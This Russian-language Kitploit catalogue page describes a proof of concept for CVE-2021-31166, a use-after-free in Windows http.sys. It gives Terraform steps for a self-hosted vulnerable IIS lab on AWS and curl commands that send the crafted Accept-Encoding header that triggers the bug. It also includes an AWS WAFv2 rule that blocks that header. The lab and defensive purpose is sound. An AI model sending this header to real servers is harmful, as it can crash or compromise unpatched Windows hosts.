Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WIn-CVE-2021-31166 — Доказательство концепции для CVE-2021-31166 (RCE в http.sys) с развёртыванием через Terraform на AWS, включая скрипты для тестирования и правило WAFv2 для блокировки эксплойта. | Kitploit
Инструменты/GitHubGitHub/bgsilvait/win-cve-2021-31166
Анализ уязвимостейЭксплуатацияОбход IDS/IPSВеб-безопасностьБезопасность облачных средDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

Доказательство концепции для CVE-2021-31166 (RCE в http.sys) с развёртыванием через Terraform на AWS, включая скрипты для тестирования и правило WAFv2 для блокировки эксплойта.

Репозиторий
25 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WIn-CVE-2021-31166

Этот репозиторий вдохновлён работой 0vercl0k и представляет собой proof of concept для CVE-2021-31166 («HTTP Protocol Stack Remote Code Execution Vulnerability»), use-after-free разыменования в http.sys, исправленного Microsoft в мае 2021 года.

Инфраструктура сборки

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Terraform создаст EC2-инстанс с Windows Server Core 20H2, установит IIS и добавит разрешения SSM для открытия Web Powershell Session из AWS Console. Также будет создан Application Load Balancer с этим инстансом в качестве целевого. По умолчанию разрешит доступ по только с .

Security Group
HTTP
ВАШЕГО IP

Получение значений

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

Проверка подключения

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

Внедрение CVE-заголовка

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

Правило для AWS WAFv2 для блокировки

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
Скачать инструмент